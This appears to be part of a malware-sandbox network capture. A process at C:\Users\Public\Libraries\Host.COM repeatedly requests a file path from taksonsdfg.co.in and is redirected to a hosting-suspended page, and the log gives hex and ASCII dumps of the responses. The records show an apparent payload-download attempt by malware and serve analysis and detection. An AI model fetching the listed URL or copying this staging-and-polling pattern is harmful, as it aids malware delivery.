                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:19 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.749903108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:20 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:21 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:21 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:21 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:21 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.749910108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:23 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:23 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:23 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:23 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.749916108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:25 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:25 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:25 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:25 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:25 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.749923108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:27 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:27 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:27 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:27 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.749928108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:29 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:29 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:29 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:29 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:29 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.749936108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:31 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:32 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:32 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:32 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.749941108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:33 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:34 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:34 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:34 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:34 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.749948108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:36 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:36 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:36 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:36 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.749952108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:37 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:38 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:38 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
